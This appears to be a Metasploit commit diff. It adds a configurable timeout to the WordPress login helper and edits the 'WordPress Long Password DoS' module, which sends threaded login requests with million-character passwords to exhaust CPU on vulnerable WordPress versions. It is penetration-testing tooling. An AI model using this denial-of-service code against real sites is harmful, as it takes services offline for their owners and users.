Add configurable timeout to WordPress login

lib/msf/http/wordpress/login.rb

@@ -6,13 +6,13 @@ module Msf::HTTP::Wordpress::Login
   # @param user [String] Username
   # @param pass [String] Password
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
-  def wordpress_login(user, pass)
+  def wordpress_login(user, pass, timeout = 20)
     redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
-    res = send_request_cgi(
+    res = send_request_cgi({
         'method' => 'POST',
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
-    )
+    }, timeout)
     if res && res.redirect? && res.redirection && res.redirection.to_s == redirect
       cookies = res.get_cookies
       # Check if a valid wordpress cookie is returned

modules/auxiliary/dos/http/wordpress_long_password_dos.rb

@@ -13,7 +13,10 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(
       info,
       'Name'            => 'WordPress Long Password DoS',
-      'Description'     => 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing.',
+      'Description'     => %q{WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x 
+                              before 4.0.1 allows remote attackers to cause a denial of service 
+                              (CPU consumption) via a long password that is improperly handled 
+                              during hashing.},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -33,8 +36,9 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptInt.new('PLENGTH', [true, 'Length of password to use', 1000000]),
-        OptInt.new('RLIMIT', [true, 'The number of requests to send', 1000]),
+        OptInt.new('RLIMIT', [true, 'The number of requests to send', 200]),
         OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
+        OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]),
         OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
         OptBool.new('VALIDATE_USER', [true, 'Validate the specified username', true])
       ], self.class)
@@ -60,6 +64,10 @@ class Metasploit3 < Msf::Auxiliary
     datastore['THREADS']
   end
 
+  def timeout
+    datastore['TIMEOUT']
+  end
+
   def user_exists(user)
     exists = wordpress_user_exists?(user)
     if exists
@@ -97,9 +105,9 @@ class Metasploit3 < Msf::Auxiliary
         threads = (1..ubound).map do |i|
           Thread.new(i) do |i|
             begin
-              wordpress_login(username, Rex::Text.rand_text_alpha(plength))
-            rescue
-              print_error("#{peer} - Timed out during request #{i}")
+              wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout)
+            rescue => e
+              print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}")
             end
           end
         end